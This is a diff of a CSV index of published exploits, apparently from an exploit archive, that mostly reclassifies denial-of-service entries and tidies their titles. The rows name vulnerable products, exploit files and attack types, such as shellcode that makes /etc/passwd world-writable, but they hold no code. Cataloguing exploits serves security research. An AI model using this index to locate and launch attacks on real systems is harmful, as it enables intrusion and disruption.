SimpleServer:WWW 1.0.5 - DoS Vulnerability",2000-07-15,"Ussr Labs",windows,dos,0 20016,platforms/windows/dos/20016.py,"Shadow Op Software Dragon Server 1.0/2.0 - Multiple DoS",2000-06-16,Prizm,windows,dos,0 20017,platforms/windows/dos/20017.py,"Max Feoktistov Small HTTP server 1.212 - Buffer Overflow",2000-06-16,"Ussr Labs",windows,dos,0 20018,platforms/solaris/local/20018.txt,"Veritas Software Volume Manager 3.0.2/3.0.3/3.0.4 File Permission Vulnerability",2000-06-16,"Dixie Flatline",solaris,local,0 @@ -17393,7 +17393,7 @@ id,file,description,date,author,platform,type,port 20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 libX11 _XAsyncReply() Stack Corruption",2000-06-19,"Chris Evans",linux,local,0 20046,platforms/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 FTP Server Vulnerability",2000-06-21,"Michael Zalewski",unix,remote,0 20048,platforms/windows/remote/20048.txt,"Microsoft Windows 2000 - Remote CPU-overload Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0 -20047,platforms/windows/remote/20047.txt,"Microsoft Windows 2000 Telnet Server DoS Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0 +20047,platforms/windows/dos/20047.txt,"Microsoft Windows 2000 - Telnet Server DoS Vulnerability",2000-06-30,"SecureXpert Labs",windows,dos,0 20049,platforms/windows/remote/20049.txt,"Check Point Software Firewall-1 4.0/1.4.1 Resource Exhaustion Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0 20050,platforms/hardware/dos/20050.c,"Check Point Software Firewall-1 3.0/1.4.0/1.4.1 Spoofed Source Denial of Service",2000-07-05,lore,hardware,dos,0 20051,platforms/windows/dos/20051.c,"Sybergen SyGate 2.0/3.11 - Denial of Service Vulnerability",2000-06-30,"Marc of eEye",windows,dos,0 @@ -17433,7 +17433,7 @@ id,file,description,date,author,platform,type,port 20087,platforms/php/webapps/20087.py,"Zabbix <= 2.0.1 - Session Extractor (0day)",2012-07-24,muts,php,webapps,0 20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0 20089,platforms/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability",2000-07-17,"Zuo Lei",windows,remote,0 -20090,platforms/hardware/remote/20090.txt,"HP JetDirect J3111A Invalid FTP Command DoS Vulnerability",2000-07-19,"Peter Grundl",hardware,remote,0 +20090,platforms/hardware/dos/20090.txt,"HP JetDirect J3111A - Invalid FTP Command DoS Vulnerability",2000-07-19,"Peter Grundl",hardware,dos,0 20091,platforms/multiple/remote/20091.txt,"Stalker Communigate Pro 3.2.4 - Arbitrary File Read Vulnerability",2000-04-03,S21Sec,multiple,remote,0 20092,platforms/cgi/local/20092.txt,"Sean MacGuire Big Brother 1.0/1.3/1.4 CGI File Creation Vulnerability",2001-06-11,xternal,cgi,local,0 20093,platforms/linux/local/20093.c,"Stanley T. Shebs Xconq 7.2.2 - Buffer Overflow Vulnerabilities in xconq",2000-06-22,V9,linux,local,0 @@ -17442,7 +17442,7 @@ id,file,description,date,author,platform,type,port 20096,platforms/windows/remote/20096.txt,"Microsoft IIS 2.0/3.0/4.0/5.0/5.1 Internal IP Address Disclosure Vulnerability",2000-07-13,"Dougal Campbell",windows,remote,0 20097,platforms/multiple/remote/20097.txt,"IBM Websphere Application Server 2.0./3.0/3.0.2.1 - Showcode Vulnerability",2000-07-24,"Shreeraj Shah",multiple,remote,0 20098,platforms/multiple/dos/20098.txt,"Netscape Communicator 4.x JPEG-Comment Heap Overwrite Vulnerability",2000-07-25,"Solar Designer",multiple,dos,0 -20099,platforms/windows/remote/20099.c,"AnalogX Proxy 4.0 4 DoS Vulnerability",2000-07-25,wildcoyote,windows,remote,0 +20099,platforms/windows/dos/20099.c,"AnalogX Proxy 4.0 4 - DoS Vulnerability",2000-07-25,wildcoyote,windows,dos,0 20100,platforms/windows/dos/20100.pl,"WFTPD 2.4.1RC11 STAT/LIST Command DoS",2000-07-21,"Blue Panda",windows,dos,0 20101,platforms/windows/dos/20101.pl,"WFTPD 2.4.1RC11 REST Command Malformed File Write DoS",2000-07-21,"Blue Panda",windows,dos,0 20102,platforms/windows/dos/20102.pl,"WFTPD 2.4.1RC11 Unauthenticated MLST Command Remote DoS",2000-07-21,"Blue Panda",windows,dos,0 @@ -17525,7 +17525,7 @@ id,file,description,date,author,platform,type,port 20189,platforms/unix/local/20189.c,"Libc locale Exploit (1)",2000-09-04,Synnergy.net,unix,local,0 20190,platforms/unix/local/20190.c,"Libc locale Exploit (2)",2000-09-04,anonymous,unix,local,0 20191,platforms/bsd/local/20191.c,"Juergen Weigert screen 3.9 User Supplied Format String Vulnerability",2000-09-05,IhaQueR@IRCnet,bsd,local,0 -20192,platforms/unix/local/20192.txt,"LPPlus 3.2.2/3.3 Permissions DoS Vulnerabilities",2000-09-06,"Dixie Flatline",unix,local,0 +20192,platforms/unix/dos/20192.txt,"LPPlus 3.2.2/3.3 - Permissions DoS Vulnerabilities",2000-09-06,"Dixie Flatline",unix,dos,0 20193,platforms/unix/local/20193.txt,"LPPlus 3.2.2/3.3 dccscan unprivileged read Vulnerability",2000-09-06,"Dixie Flatline",unix,local,0 20194,platforms/cgi/remote/20194.pl,"CGI Script Center Auction Weaver 1.0.2 - Remote Command Execution Vulnerability",2000-08-30,teleh0r,cgi,remote,0 20196,platforms/lin_x86/shellcode/20196.c,"Linux x86 - chmod 666 /etc/passwd & /etc/shadow (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 @@ -17549,7 +17549,7 @@ id,file,description,date,author,platform,type,port 20214,platforms/windows/remote/20214.pl,"Check Point Software Firewall-1 3.0/1 4.0 Session Agent Impersonation Vulnerability",1998-09-24,"Andrew Danforth",windows,remote,0 20215,platforms/multiple/remote/20215.pl,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (1)",2000-08-15,"Nelson Brito",multiple,remote,0 20216,platforms/multiple/remote/20216.sh,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (2)",2000-10-01,"Gregory Duchemin",multiple,remote,0 -20217,platforms/linux/local/20217.c,"RedHat Linux 6.1 i386 Tmpwatch Recursive Write DoS Vulnerability",2000-09-09,"zenith parsec",linux,local,0 +20217,platforms/linux/dos/20217.c,"RedHat Linux 6.1 i386 - Tmpwatch Recursive Write DoS Vulnerability",2000-09-09,"zenith parsec",linux,dos,0 20218,platforms/cgi/remote/20218.txt,"YaBB 9.1.2000 - Arbitrary File Read Vulnerability",2000-09-10,pestilence,cgi,remote,0 20219,platforms/windows/dos/20219.txt,"WebTV for Windows 98/ME DoS Vulnerability",2000-09-12,Smashstack,windows,dos,0 20220,platforms/linux/remote/20220.txt,"Mandrake 6.1/7.0/7.1 /perl http Directory Disclosure Vulnerability",2000-09-11,anonymous,linux,remote,0 @@ -17557,7 +17557,7 @@ id,file,description,date,author,platform,type,port 20222,platforms/windows/remote/20222.cpp,"Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability",2000-08-14,@stake,windows,remote,0 20223,platforms/windows/remote/20223.txt,"Sambar Server 4.3/4.4 beta 3 - Search CGI Vulnerability",2000-09-15,dethy,windows,remote,0 20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0 -20225,platforms/windows/remote/20225.pl,"Alt-N MDaemon 3.1.1 DoS Vulnerability",1999-12-01,"Ussr Labs",windows,remote,0 +20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - DoS Vulnerability",1999-12-01,"Ussr Labs",windows,dos,0 20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel SCTP Remote NULL Ptr Dereference DoS",2012-08-03,"Shaun Colley",freebsd,dos,0 20542,platforms/windows/local/20542.rb,"globalSCAPE CuteZIP Stack Buffer Overflow",2012-08-15,metasploit,windows,local,0 20228,platforms/windows/dos/20228.pl,"TYPSoft 0.7 x FTP Server Remote DoS Vulnerability",1999-06-08,dethy,windows,dos,0 @@ -17571,7 +17571,7 @@ id,file,description,date,author,platform,type,port 20236,platforms/linux/remote/20236.txt,"S.u.S.E. Linux 6.3/6.4 Installed Package Disclosure Vulnerability",2000-09-21,t0maszek,linux,remote,0 20237,platforms/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 - _From:_ Field Buffer Overflow Vulnerability",2000-09-23,Arkane,linux,remote,0 20238,platforms/cgi/remote/20238.txt,"Alabanza Control Panel 3.0 Domain Modification Vulnerability",2000-09-24,"Weihan Leow",cgi,remote,0 -20239,platforms/multiple/remote/20239.txt,"HP OpenView Network Node Manager 6.10 SNMP DoS Vulnerability",2000-09-26,DCIST,multiple,remote,0 +20239,platforms/multiple/dos/20239.txt,"HP OpenView Network Node Manager 6.10 - SNMP DoS Vulnerability",2000-09-26,DCIST,multiple,dos,0 20240,platforms/windows/remote/20240.txt,"Microsoft Windows Media Player 7 Embedded OCX Control Vulnerability",2000-09-26,"Ussr Labs",windows,remote,0 20241,platforms/palm_os/local/20241.txt,"Palm OS 3.5.2 Weak Encryption Vulnerability",2000-09-26,@stake,palm_os,local,0 20242,platforms/cgi/remote/20242.txt,"Unixware 7.0 SCOhelp HTTP Server Format String Vulnerability",2000-09-26,"Juliano Rizzo",cgi,remote,0 @@ -17651,7 +17651,7 @@ id,file,description,date,author,platform,type,port 20320,platforms/windows/webapps/20320.txt,"Zoho BugTracker Multiple Stored XSS Vulnerabilities",2012-08-07,LiquidWorm,windows,webapps,0 20321,platforms/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution",2012-08-08,metasploit,windows,remote,0 20322,platforms/multiple/remote/20322.html,"Sun HotJava Browser 3 - Arbitrary DOM Access Vulnerability",2000-10-25,"Georgi Guninski",multiple,remote,0 -20323,platforms/hardware/remote/20323.txt,"Cisco IOS 12 Software _?/_ HTTP Request DoS Vulnerability",2000-10-25,"Alberto Solino",hardware,remote,0 +20323,platforms/hardware/dos/20323.txt,"Cisco IOS 12 - Software _?/_ HTTP Request DoS Vulnerability",2000-10-25,"Alberto Solino",hardware,dos,0 20324,platforms/windows/remote/20324.txt,"iPlanet Certificate Management System 4.2 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0 20325,platforms/windows/remote/20325.txt,"Netscape Directory Server 4.12 - Directory Server Directory Traversal Vulnerability",2000-10-25,CORE-SDI,windows,remote,0 20326,platforms/unix/local/20326.sh,"ntop 1.x - -i Local Format String Vulnerability",2000-10-18,"Paul Starzetz",unix,local,0 @@ -17660,11 +17660,11 @@ id,file,description,date,author,platform,type,port 20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 crontab /tmp File Vulnerability",2000-10-20,"Kyong-won Cho",hp-ux,local,0 20330,platforms/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL Remote Arbitrary Command Execution Vulnerability",2000-10-26,blackangels,hardware,remote,0 20331,platforms/hardware/remote/20331.c,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0 -20332,platforms/hardware/remote/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (2)",1998-03-17,Rootshell,hardware,remote,0 +20332,platforms/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (2)",1998-03-17,Rootshell,hardware,dos,0 20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Vulnerability",1997-07-21,"D. J. Bernstein",unix,local,0 20334,platforms/windows/remote/20334.java,"CatSoft FTP Serv-U 2.5.x Brute-Force Vulnerability",2000-10-29,Craig,windows,remote,0 20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Services for Windows 2000/NT 4.0 - (.htw) Cross-Site Scripting Vulnerability",2000-10-28,"Georgi Guninski",windows,remote,0 -20336,platforms/multiple/remote/20336.txt,"Unify eWave ServletExec 3.0 c DoS Vulnerability",2000-10-30,"Foundstone Labs",multiple,remote,0 +20336,platforms/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - DoS Vulnerability",2000-10-30,"Foundstone Labs",multiple,dos,0 20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 AFS ACL Packet Buffer Overflow Vulnerability",2001-01-02,Zhodiac,unix,remote,0 20338,platforms/linux/local/20338.c,"SAMBA 2.0.7 SWAT Symlink Vulnerability (1)",2000-11-01,Optyx,linux,local,0 20339,platforms/linux/local/20339.sh,"SAMBA 2.0.7 SWAT Symlink Vulnerability (2)",2000-11-01,Optyx,linux,local,0 @@ -17727,11 +17727,11 @@ id,file,description,date,author,platform,type,port 20397,platforms/cgi/remote/20397.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 Path Disclosure Vulnerability",2000-11-10,sozni,cgi,remote,0 20398,platforms/php/webapps/20398.txt,"MobileCartly 1.0 - Arbitrary File Deletion Vulnerability",2012-08-10,GoLd_M,php,webapps,0 20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services for Windows 2000 File Verification Vulnerability",2000-11-10,"Georgi Guninski",windows,remote,0 -20400,platforms/cgi/remote/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 DoS Vulnerability",2000-11-10,sozni,cgi,remote,0 +20400,platforms/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - DoS Vulnerability",2000-11-10,sozni,cgi,dos,0 21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5_Netscape Communicator 4 IMG Tag DoS Vulnerability",2001-06-19,"John Percival",multiple,dos,0 20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0 20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 modprobe Arbitrary Command Execution Vulnerability",2000-11-12,"Michal Zalewski",linux,local,0 -20403,platforms/windows/remote/20403.txt,"Small HTTP server 2.0 1 Non-Existent File DoS Vulnerability",2000-11-14,"403-security team",windows,remote,0 +20403,platforms/windows/dos/20403.txt,"Small HTTP server 2.0 1 - Non-Existent File DoS Vulnerability",2000-11-14,"403-security team",windows,dos,0 20404,platforms/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Buffer Overflow Vulnerability",2000-11-14,Vort-fu,beos,remote,0 20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure Vulnerability",2000-11-14,steeLe,cgi,remote,0 20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 Memory Contents Disclosure Vulnerability",2000-11-16,CORE-SDI,multiple,remote,0 @@ -17758,7 +17758,7 @@ id,file,description,date,author,platform,type,port 20429,platforms/jsp/remote/20429.txt,"Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability",2000-11-23,benjurry,jsp,remote,0 20430,platforms/cgi/remote/20430.txt,"Info2www 1.0/1.1 CGI Input Handling Vulnerability",1998-03-03,"Niall Smart",cgi,remote,0 20431,platforms/php/webapps/20431.txt,"Phorum 3.x - Arbitrary File Read Vulnerability",2000-11-24,"Joao Gouveia",php,webapps,0 -20432,platforms/windows/local/20432.txt,"Network Associates WebShield SMTP 4.5 Invalid Outgoing Recipient Field DoS Vulnerability",2000-11-23,"Jari Helenius",windows,local,0 +20432,platforms/windows/dos/20432.txt,"Network Associates WebShield SMTP 4.5 - Invalid Outgoing Recipient Field DoS Vulnerability",2000-11-23,"Jari Helenius",windows,dos,0 20433,platforms/cgi/remote/20433.txt,"CGI City CC Whois 1.0 Metacharacter Vulnerability",1999-11-09,"Cody T. - hhp",cgi,remote,0 20434,platforms/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal Vulnerability",1998-01-26,"Dennis Moore",cgi,remote,0 20435,platforms/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x & NCSA httpd 1.x - test-cgi Directory Listing Vulnerability",1996-04-01,@stake,cgi,remote,0 @@ -17818,7 +17818,7 @@ id,file,description,date,author,platform,type,port 20491,platforms/multiple/remote/20491.txt,"KTH Kerberos 4 - Arbitrary Proxy Usage Vulnerability",2000-12-08,"Jouko Pynnonen",multiple,remote,0 20492,platforms/unix/remote/20492.txt,"ssldump 0.9 b1 Format String Vulnerability",2000-12-11,c0ncept,unix,remote,0 20493,platforms/linux/local/20493.sh,"University of Washington Pico 3.x/4.x File Overwrite Vulnerability",2000-12-11,mat,linux,local,0 -20494,platforms/linux/remote/20494.pl,"RedHat Linux 7.0 Roaring Penguin PPPoE Denial of Service Vulnerability",2000-12-11,dethy,linux,remote,0 +20494,platforms/linux/dos/20494.pl,"RedHat Linux 7.0 - Roaring Penguin PPPoE Denial of Service Vulnerability",2000-12-11,dethy,linux,dos,0 20495,platforms/unix/remote/20495.c,"Oops Proxy Server 1.4.22 - Buffer Overflow Vulnerabilities (1)",2000-12-11,CyRaX,unix,remote,0 20496,platforms/linux/remote/20496.c,"Oops Proxy Server 1.4.22 - Buffer Overflow Vulnerabilities (2)",2000-12-07,diman,linux,remote,0 20497,platforms/cgi/remote/20497.html,"Leif M. Wright everythingform.cgi 2.0 - Arbitrary Command Execution Vulnerability",2000-12-11,rpc,cgi,remote,0 @@ -17856,7 +17856,7 @@ id,file,description,date,author,platform,type,port 20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x Firewall Denial of Service Vulnerability",2001-01-08,Nsfocus,sco,dos,0 20533,platforms/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Remote Arbitrary Command Execution Vulnerability",2001-01-07,scott,cgi,remote,0 20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition DoS Vulnerability",2001-01-10,"Murat - 2",multiple,dos,0 -20535,platforms/linux/local/20535.txt,"ReiserFS 3.5.28 Kernel - DoS & Code Execution Vulnerability",2001-01-09,"Marc Lehmann",linux,local,0 +20535,platforms/linux/dos/20535.txt,"ReiserFS 3.5.28 Kernel - DoS (Possible Code Execution Vulnerability)",2001-01-09,"Marc Lehmann",linux,dos,0 20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0 20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 Backdoor Password Vulnerability",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0 20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 Incorrect File Permissions Vulnerability",2001-01-11,"Tamer Sahin",php,webapps,0 @@ -17881,8 +17881,8 @@ id,file,description,date,author,platform,type,port 20558,platforms/multiple/dos/20558.txt,"Apache 1.2 Web Server DoS Vulnerability",1997-12-30,"Michal Zalewski",multiple,dos,0 20559,platforms/windows/remote/20559.c,"tinyproxy tinyproxy 1.3.2/1.3.3 Heap Overflow Vulnerability",2001-01-17,CyRaX,windows,remote,0 20560,platforms/unix/local/20560.c,"SSH 1.2.x Secure-RPC Weak Encrypted Authentication Vulnerability",2001-01-16,"Richard Silverman",unix,local,0 -20561,platforms/linux/remote/20561.pl,"Dan Bernstein QMail 1.0 3 RCPT Denial of Service Vulnerability (1)",1997-06-12,"Frank DENIS",linux,remote,0 -20562,platforms/linux/remote/20562.c,"Dan Bernstein QMail 1.0 3 RCPT Denial of Service Vulnerability (2)",1997-06-12,"Wietse Venema",linux,remote,0 +20561,platforms/linux/dos/20561.pl,"Dan Bernstein QMail 1.0 3 - RCPT Denial of Service Vulnerability (1)",1997-06-12,"Frank DENIS",linux,dos,0 +20562,platforms/linux/dos/20562.c,"Dan Bernstein QMail 1.0 3 - RCPT Denial of Service Vulnerability (2)",1997-06-12,"Wietse Venema",linux,dos,0 20563,platforms/unix/remote/20563.txt,"wu-ftpd 2.4.2/2.5 .0/2.6.0/2.6.1/2.6.2 - FTP Conversion Vulnerability",1999-12-20,suid,unix,remote,0 20564,platforms/windows/dos/20564.txt,"Microsoft Windows NT 4.0 SNMP-WINS DoS Vulnerability",1997-10-07,CRouland,windows,dos,0 20565,platforms/hardware/remote/20565.c,"HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A LCD Display Modification Vulnerability",1997-12-08,sili,hardware,remote,0 @@ -17910,7 +17910,7 @@ id,file,description,date,author,platform,type,port 20586,platforms/php/webapps/20586.txt,"Phorum 3.0.7 admin.php3 Unverified Administrative Password Change Vulnerability",2000-01-06,"Max Vision",php,webapps,0 20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 violation.php3 - Arbitrary Email Relay Vulnerability",2000-01-01,"Max Vision",php,webapps,0 20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 - auth.php3 Backdoor Vulnerabililty",2000-01-06,"Max Vision",php,webapps,0 -20589,platforms/windows/local/20589.c,"eEye Digital Security IRIS 1.0.1 GET Denial of Service Vulnerability",2001-01-21,grazer,windows,local,0 +20589,platforms/windows/dos/20589.c,"eEye Digital Security IRIS 1.0.1 - GET Denial of Service Vulnerability",2001-01-21,grazer,windows,dos,0 20590,platforms/windows/remote/20590.txt,"Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR Vulnerability",1998-12-25,"rain forest puppy",windows,remote,0 20591,platforms/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure Vulnerability",2001-01-24,"Security Research Team",multiple,remote,0 20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 JSP/JSPSQL Remote File Reading Vulnerability",2000-01-22,"Georgi Guninski",jsp,remote,0 @@ -17945,7 +17945,7 @@ id,file,description,date,author,platform,type,port 20623,platforms/cgi/remote/20623.txt,"carey internets services commerce.cgi 2.0.1 - Directory Traversal Vulnerability",2001-02-12,slipy,cgi,remote,0 20624,platforms/windows/remote/20624.rb,"Adobe Flash Player 11.3 Font Parsing Code Execution",2012-08-20,metasploit,windows,remote,0 20625,platforms/multiple/remote/20625.txt,"SilverPlatter WebSPIRS 3.3.1 File Disclosure Vulnerability",2001-02-12,cuctema,multiple,remote,0 -20626,platforms/linux/local/20626.c,"Linux sysctl() Kernel 2.2.x Memory Reading Vulnerability",2001-02-09,"Chris Evans",linux,local,0 +20626,platforms/linux/local/20626.c,"Linux sysctl() Kernel 2.2.x - Memory Reading Vulnerability",2001-02-09,"Chris Evans",linux,local,0 20627,platforms/php/webapps/20627.py,"IlohaMail Webmail Stored XSS",2012-08-18,"Shai rod",php,webapps,0 20628,platforms/windows/remote/20628.txt,"his software auktion 1.62 - Directory Traversal Vulnerability",2001-02-12,cuctema,windows,remote,0 20629,platforms/cgi/remote/20629.txt,"Way-Board 2.0 File Disclosure Vulnerability",2001-02-12,cuctema,cgi,remote,0 @@ -17972,12 +17972,12 @@ id,file,description,date,author,platform,type,port 20651,platforms/windows/local/20651.txt,"datawizards ftpxq 2.0.93 - Directory Traversal Vulnerability",2001-02-28,joetesta,windows,local,0 20652,platforms/hardware/remote/20652.txt,"Cisco IOS 11.x/12.0 ILMI SNMP Community String Vulnerability",2001-02-27,pask,hardware,remote,0 20653,platforms/windows/remote/20653.txt,"SunFTP 1.0 Build 9 Unauthorized File Access Vulnerability",2001-03-02,se00020,windows,remote,0 -20654,platforms/hardware/remote/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 Telnet Administration DoS",2001-02-26,altomo,hardware,remote,0 +20654,platforms/hardware/dos/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 - Telnet Administration DoS",2001-02-26,altomo,hardware,dos,0 20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 DoS Vulnerability",2001-02-27,slipy,windows,dos,0 -20656,platforms/windows/remote/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service Vulnerability",2001-02-27,slipy,windows,remote,0 +20656,platforms/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service Vulnerability",2001-02-27,slipy,windows,dos,0 20657,platforms/windows/remote/20657.txt,"robin twombly a1 http server 1.0 - Directory Traversal Vulnerability",2001-02-27,slipy,windows,remote,0 20658,platforms/unix/local/20658.txt,"Joe Text Editor 2.8 - (.joerc) Arbitrary Command Execution Vulnerability",2001-02-28,"Wkit Security",unix,local,0 -20659,platforms/multiple/remote/20659.txt,"Netwin SurgeFTP 1.0 b Malformed Request Denial of Service Vulnerability",2001-03-01,"the Strumpf Noir Society",multiple,remote,0 +20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0 b - Malformed Request Denial of Service Vulnerability",2001-03-01,"the Strumpf Noir Society",multiple,dos,0 20660,platforms/unix/remote/20660.txt,"KICQ 1.0 - Remote Arbitrary Command Execution Vulnerability",2001-02-14,"Marc Roessler",unix,remote,0 20661,platforms/windows/remote/20661.txt,"jarle aase war ftpd 1.67 b04 - Directory Traversal Vulnerability",2001-03-06,se00020,windows,remote,0 20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe HTTPD 1.1 Get Denial of Service Vulnerability",2001-02-28,joetesta,windows,dos,0 @@ -18002,7 +18002,7 @@ id,file,description,date,author,platform,type,port 20679,platforms/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Buffer Overflow Vulnerability (2)",2001-03-08,"the itch",unix,local,0 20680,platforms/windows/remote/20680.html,"Microsoft Internet Explorer 5.0.1/5.5/6.0 Telnet Client File Overwrite Vulnerability",2001-03-09,"Oliver Friedrichs",windows,remote,0 20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 DoS Vulnerability",2001-01-22,honoriak,windows,dos,0 -20682,platforms/windows/remote/20682.txt,"Michael Lamont Savant Web Server 3.0 DoS Vulnerability",2001-03-09,Phiber,windows,remote,0 +20682,platforms/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - DoS Vulnerability",2001-03-09,Phiber,windows,dos,0 20683,platforms/cgi/remote/20683.txt,"Ikonboard 2.1.7 b Remote File Disclosure Vulnerability",2001-03-11,"Martin J. Muench",cgi,remote,0 20684,platforms/solaris/local/20684.c,"Solaris 2.5/2.6/7.0/8 tip Buffer Overflow Vulnerability",2001-03-27,"Pablo Sor",solaris,local,0 20685,platforms/multiple/remote/20685.txt,"IBM Net.Commerce 3.1/3.2 WebSphere Weak Password Vulnerability",2001-03-07,"Rudi Carell",multiple,remote,0 @@ -18036,13 +18036,13 @@ id,file,description,date,author,platform,type,port 20725,platforms/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Remote Arbitrary Commands Vulnerability",2001-04-02,"UkR hacking team",cgi,remote,0 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 File Existence Disclosure Vulnerability",2001-04-03,"Rob Beck",windows,remote,0 20727,platforms/linux/remote/20727.c,"Ntpd Remote Buffer Overflow Vulnerability",2001-04-04,"babcia padlina ltd",linux,remote,0 -20728,platforms/windows/remote/20728.txt,"602Pro Lan Suite 2000a Long HTTP Request Denial of Service Vulnerability",2001-04-05,nitr0s,windows,remote,0 +20728,platforms/windows/dos/20728.txt,"602Pro Lan Suite 2000a - Long HTTP Request Denial of Service Vulnerability",2001-04-05,nitr0s,windows,dos,0 20729,platforms/php/webapps/20729.txt,"PHP Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability",2001-04-02,"Juan Diego",php,webapps,0 20730,platforms/unix/remote/20730.c,"IPFilter 3.x Fragment Rule Bypass Vulnerability",2001-04-09,"Thomas Lopatic",unix,remote,0 20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0 20732,platforms/freebsd/remote/20732.pl,"freebsd 4.2-stable ftpd glob() Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0 20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x-2.8 ftpd glob() Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0 -20734,platforms/hardware/remote/20734.sh,"Cisco PIX 4.x/5.x TACACS+ Denial of Service Vulnerability",2001-04-06,"Claudiu Calomfirescu",hardware,remote,0 +20734,platforms/hardware/dos/20734.sh,"Cisco PIX 4.x/5.x TACACS+ - Denial of Service Vulnerability",2001-04-06,"Claudiu Calomfirescu",hardware,dos,0 20735,platforms/sco/dos/20735.txt,"SCO OpenServer 5.0.6 lpadmin Buffer Overflow Vulnerability",2001-03-27,"Secure Network Operations",sco,dos,0 20736,platforms/sco/dos/20736.txt,"SCO Open Server 5.0.6 lpforms Buffer Overflow Vulnerability",2001-03-27,"Secure Network Operations",sco,dos,0 20737,platforms/sco/dos/20737.txt,"SCO Open Server 5.0.6 lpshut Buffer Overflow Vulnerability",2001-03-27,"Secure Network Operations",sco,dos,0 @@ -18061,7 +18061,7 @@ id,file,description,date,author,platform,type,port 20750,platforms/linux/dos/20750.txt,"Trend Micro Interscan Viruswall (Linux) 3.0.1 - Multiple Program Buffer Overflow",2001-04-13,"eeye security",linux,dos,0 20751,platforms/solaris/local/20751.txt,"Solaris 7.0/8 IPCS Timezone Buffer Overflow Vulnerability",2001-04-12,"Riley Hassell",solaris,local,0 20752,platforms/cgi/remote/20752.txt,"NCM Content Management System content.pl Input Validation Vulnerability",2001-04-13,"RA-Soft Security",cgi,remote,0 -20753,platforms/cgi/remote/20753.txt,"IBM Websphere/Net.Commerce 3 CGI-BIN Macro Denial of Service Vulnerability",2001-04-13,"ET LoWNOISE",cgi,remote,0 